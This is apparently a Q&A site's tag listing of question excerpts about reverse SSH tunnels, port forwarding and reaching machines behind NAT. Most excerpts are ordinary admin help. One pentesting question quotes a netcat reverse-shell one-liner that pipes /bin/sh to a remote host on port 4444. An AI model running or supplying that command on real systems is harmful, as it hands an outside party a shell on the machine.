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Questions tagged [reverse-tunnel]

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1 answer

How to get a persistent reverse SSH tunnel using autossh?

(just asked this on SO but was adviced to take it here) I managed to create a reverse SSH tunnel between a Raspberry Pi 2 and a server of mine (server which has a static IP) and it works fine. The ...
Cedric Martin's user avatar
7 votes
1 answer

Reverse tunnel, remote desktop session hangs when moving PuTTY window

I have a ssh server on my Windows 10 computer at home and when I set up a reverse tunnel from my Windows 10 work computer with PuTTY with this command: putty.exe -ssh user@xxxxxxxxxx -R 9999:...
Joost's user avatar
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6 votes
1 answer

How do I share a reverse SSH tunnel on a network?

I have a remote computer on a 3G PPP connection. I can't connect to this computer via the Internet as I believe the PPP IP pool uses NAT to connect to the Internet (I get given a 10.x.x.x address when ...
Matt Cooper's user avatar
5 votes
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Expose a Reverse SSH Tunnel on the Remote server

I set up a Reverse SSH tunnel from my home computer to my work server: ssh -f -N -R 19999:localhost:22 remoteuser@server To connect to my home computer I have to first log in to the server and then ...
andresperezl's user avatar
5 votes
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How to specify what port RDP responds to?

I need to figure out a way to force RDP(Remote Desktop) to respond to a specific port Instead of a RHP(Random High Port). I am not asking how to change what port RDP "Listens" on, but rather the ...
Kentgrav's user avatar
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Is it possible to make a reverse tunnel using MOSH?

on My PC: mosh --ssh="ssh -R 1024:localhost:22" root@RaspberryPi on Pi: ssh -p 1024 root@localhost But I got this message: pi@raspberrypi ~ $ ssh -p 1024 root@localhost socket: Address family not ...
user1150125's user avatar
3 votes
2 answers

Need to figure out a way for RDP to call back to a local listener on a specified Ephemeral port though a Reverse SSH Tunnel

This relates to a previous question that was getting entirely too long and confusing due to my constant updates and edits and I was told to re ask it. So I am cleaning it up and asking a more direct ...
Kentgrav's user avatar
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Run a server behind router

I own a virtual private server. I currently want to run a server on my local computer (behind a router that I don't have admin access to so I can't port forward). Can I use the virtual private server ...
Molten Ice's user avatar
3 votes
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How to find out dynamic reverse SSH remote port without sudo

I can initialize reverse SSH from client with following command: $ ssh -R 0:localhost:22 <server_host> Allocated port 42853 for remote forward to localhost:22 How can I figure out that 42853 ...
Jaakko's user avatar
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View router webpage via remote PC

Not sure if this can be done but here goes. What I want to acheive is this, a user on a laptop can view a router web page that is on another PC (client), the route to this client is via another PC (...
Pauls's user avatar
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2 votes
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SSH remote forwarded port doesn't accept external connection (even with `GetewayPorts yes`)

I am trying to set a reverse/remote SSH port forward, using this schema where the Apache Linux server forwards the port 80 to the SSH server. So On the SSH server I changed the configuration to ...
Vincent Diallo-Nort's user avatar
2 votes
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Reverse ssh not working. ssh_exchange_identification: Connection closed by remote host

This is what I run in the server(A) to open tunnel: ssh -vf -N -T -R 222:localhost:22 me@myserverip -p 2222 This is what I run on the myserver server(B) to use the tunnel: ssh -vp 222 me@localhost ...
yukashima huksay's user avatar
2 votes
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How to host a local server using Heroku?

I want to host a Node.js website running on my laptop, so that it would be accessible to other people. I have tried port-forwarding on my router, but it does not work because my ISP has stopped ...
wolfram77's user avatar
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SSH reverse tunnel to monitor and manage remote devices

I have a set a distributed set of devices running Ubuntu 12.04 that I am distributing to clients. I would like to manage them remotely. They may not have fixed IPs and potentially might be behind ...
acid_crucifix's user avatar
2 votes
4 answers

Can I use other host instead of localhost for Destination Field in SSH Reverse Tunnel Port Forwarding?

I am using Putty to achieve SSH Reverse Tunnel Port Forwarding. Most of the tutorials are teaching me to forward remote port to localhost port. However, may I know is it make sense to input other host ...
mannok's user avatar
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2 votes
2 answers

Browsing through ssh socks proxy -> through reverse tunnel

I have HostA behind a firewall establishing a reverse ssh tunnel to HostB. I want to setup a proxy on HostB that will forward the connection through the reverse ssh tunnel and out through HostA. I ...
Chintan Desai's user avatar
2 votes
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connect to Windows share from Ubuntu Server using reverse ssh tunnel

I'm missing a piece of this puzzle so I hope someone can help me. The SETUP: My computer with Windows O/S is behind a NAT/Firewall at work and I can not open any ports to forward. At home I have a ...
Benjamin Jones's user avatar
2 votes
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Tunneling multicast over SSH

There's a remote server which has a LAN interface configured with IP address as well it has a routing rule enabling all multicast -> The remote server is ...
Alejandro Lichtenfeld's user avatar
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How do I prevent my SSH tunnel port forwarding rules from disconnecting when idle?

I've set up some reverse port forwarding rules on my KiTTY (fork of PuTTY) client (Windows 7) through a SSH Tunnel to my remote OpenSSH server (Windows 2012). Everything works great at first, as using ...
Ryza Jr.'s user avatar
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2 answers

How to SSH between two servers behind firewalls (without a 3rd party server)

There are many posts on this topic and SSH Tunnelling however, some come close to meeting this requirement, missing out a step or two and others are difficult to follow because of unclear terms. This ...
SC-SL's user avatar
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How to use reverse ssh tunneling with multiple jump servers

How would I use SSH Tunneling for an architecture in the example below? Scenario: I am physically logged into Windows PC Local and wish to remote desktop into the Windows PC Remote using port 3389....
BadAndy's user avatar
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Reverse proxy with ssh

I have the following setup: A: my linux laptop at home B: a Windows machine to which I have access via VNC, this PC is behind a restrictive firewall C: a PLC on the same subnet as B I'd like ...
PaperTsar's user avatar
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Cannot connect to VNC through reverse ssh

I am trying to set up a connection between my work machine (running Ubuntu 20) and my home machine (running Ubuntu 18) through a (G)cloud instance (running Ubuntu 20). Because of the strict firewall ...
Michele Valotti's user avatar
1 vote
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SSH reverse tunneling to a linux machine

I have essentially the same configuration as this question (relevant image below): where I want to be able to ssh into RPC-2 from either LPC-1 directly and from any arbitrary machine via LPC-1. I ...
SIRCAVEC's user avatar
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2 answers

SSH dynamic port forwarding (SOCKS) from LAN (behind NAT) to another LAN (behind NAT); middle server with public IP address available

I need advice how to make proper ssh connections. My network: I want to be able to view web server content from devices B_1, B_2, B_3 using FF with SOCKS configured on Client A. Note that firewall ...
Hubert Von Süßer Busarzt's user avatar
1 vote
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Unable to reach Plex using SSH reverse tunneling

I've got Plex installed on a Windows computer at home. My internet connection goes over CG-NAT, so in order to access home I use an SSH reverse tunnel against a dedicated Linux server that I have on ...
FrakyDale's user avatar
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Reverse SSH connection at startup?

I have a Raspberry Pi, running Kali Linux. What I want it to do is, as soon as it boots, to connect with a reverse SSH connection to my machine at home, so I can control it wherever it is. I created ...
Nim's user avatar
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SSH & SOCKS inside an HTTPS encrypted tunnel using a Windows Apache Server or what?

I have spent hours reviewing Super/Stack and other sites and I haven't found the answer yet. So, I am going to give it a shot to ask here again. I would point out some partial answers I found in ...
DjIns1ght's user avatar
1 vote
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Reverse tunnel to access external API on firewalled server accessible only via bastion

If the title sounds confusing, it is, and I am highly confused. Here's the situation: I have a prod server prod1 that's firewalled incoming/outgoing traffic from/to all external Internet Additionally,...
Trevor Hartman's user avatar
1 vote
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Reverse connection to remote database

I have a very large database on my home server. But my ISP doesn't allow me a port forward. Is there a way to reverse the connection from my web hosting server to my home database server which doesn't ...
Temuujin CC's user avatar
1 vote
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How can reverse-SSH be established with Windows Subsystem for Linux (WSL)?

I need reverse-SSH access to Windows Subsystem for Linux (WSL) Ubuntu. Normally this isn't a problem with Linux machines but with WSL it isn't working. First I establish the reverse SSH connection ...
BlandCorporation's user avatar
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How to SSH tunnel back to a private host from an internet facing server

I have a server running SSH which is Internet facing (lets call this host A). I also have a server running which is behind a firewall. It is running sshd, however it cannot SSH out to the Internet, ...
Alistair Ross's user avatar
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Serve MJPG image stream from reverse ssh tunnel

Background I am working on a project that involves 2 servers. Server A is a VPS running Ubuntu 14.04 with a public IP address. Server B is running a MJPG service on port 8080 and does not have a ...
laytod's user avatar
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Background chained ssh tunnel dropped instantly

I'm trying to establish the following chained ssh tunnel: ssh -A -t gatewayuser@gatewayserver 'ssh -N -A -t -R 55520: user@dbserver' & This is part of a shell script, I want the ...
James's user avatar
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Reverse SSH tunnel - Fails on Certain Ports

I'm trying to forward very specific ports using a reverse SSH tunnel. MachineA is the target machine (the one the command is being run from) and MachineB is the tunnel (the one SSH is connecting to ...
jstm88's user avatar
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SSH Reverse Tunneling

I use this command to create a reverse tunneling from my home machine to an AWS instance, so that I can connect to my home machine from anywhere ssh -R 5000:localhost:8000 aws_machine However, when ...
ganessh's user avatar
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How to remotely write to a file using multi-hop SSH

Questions like How to remotely write to a file using SSH are about a direct SSH. But I am reaching the end of a reverse tunnel which ends on intermediateserver. That is, I'm ssh'ing to one machine ...
CPBL's user avatar
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How could a reverse SSH tunnel be instantiated remotely via the web?

I have a remote server behind a firewall and a NAT with no external IP address. I want to be able to establish a reverse SSH connection with this server. The issue is getting the remote server to ...
BlandCorporation's user avatar
0 votes
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Reverse tunneling for proxy

I need to use A as a proxy to forward all traffic through it, but all of its ports are closed. I have server B which has access to all the ports. The general idea is that server A connects to server B,...
AndryS1's user avatar
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4G Reverse SSH tunnel through a port forwarded VPN?

So I have a laptop connected to the 4G network the only problem is I want to connect to it via SSH from my PC. So far I have discovered that ny network operator does not allow port forwarding but I ...
Definity's user avatar
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how to find which port reverse connection wants to connect? [closed]

A Client wants to connect to a server. The server doesn't know which port the client is using for open that port. How to find which port reverse connection (incoming connection) wants to connect?
Elkhazrajy's user avatar
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How to make port forwarding in initramfs stage?

I can install dropbear into the initramfs and successfully connect to this ssh server (IP: my_initramfs_ip) on boot stage, as described here. Now I want to perform a port forwarding as a client at ...
ceremcem's user avatar
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How can a "dropped" but still connected reverse-SSH tunnel be picked up again?

I have a remote Raspberry Pi computer that connects from behind its restrictive firewall to my server by reverse SSH tunnel. Imagine that this Raspberry Pi is on the difficult-to-access roof of a ...
BlandCorporation's user avatar
0 votes
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remote desktop for the terminal

Looking to allow a trusted friend access to an SSH session on my local machine. Is there a script or one liner that will allow for the ease of use I know from remote login software (teamviewer etc.) ...
yoshco's user avatar
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Launchd File for reverse stream

Does anyone have any ideas why this fails to execute a reverse stream connection when loaded? <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "...
November's user avatar
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Reverse shell with puTTY or poderosa?

Can I open a reverse shell with Podersa or puTTY? I would prefer Poderosa but I can't find the option to create a tunnel from my local machine port 9000 to my remote machine port 9000?
Cybercartel's user avatar
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Trying to understand telnet behavior and pentesting reverse shell in Unix

The first not working for me and the second working on telnet session, Unix: What is the difference between: .RUN rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ip 4444 >/tmp/f And ...
Amir Niko's user avatar
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Is it possible to create a UDP/TCP reverse gaming tunnel?

For reference, I don't have much experience in the routing/networking world. I have a gaming server hosted on my desktop running in Linux Ubuntu headless 22.04. it's running on a local IP something ...
Giuseppe Carbone's user avatar
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How do you reverse tunnel to a different local ip

I have a reverse tunnel following this answer... How to get a persistent reverse SSH tunnel using autossh? Both ends are RaspberryPis. MotionEyeOS is on a eero router with no routing options and a ...
user2909029's user avatar
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SSH tunnel to database server over multiple hops

SSH tunneling is easy to accomplish: ssh -D1234 host But we have a more specific infrastructure Host 1 (Remote server placed in my company) Host 2 (Local server inside Host 1 network) Host 3 (...
Mohamed Riyad's user avatar